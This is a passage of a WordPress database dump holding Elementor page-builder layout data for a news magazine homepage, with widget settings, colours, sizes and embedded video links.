"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"250\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1427,492,'_elementor_version','0.4'),(1428,492,'_elementor_css','a:3:{s:4:\"time\";i:1508921109;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1430,493,'_elementor_edit_mode','builder'),(1431,493,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"296\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1432,493,'_elementor_version','0.4'),(1433,493,'_elementor_css','a:3:{s:4:\"time\";i:1508921325;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1435,494,'_elementor_edit_mode','builder'),(1436,494,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4c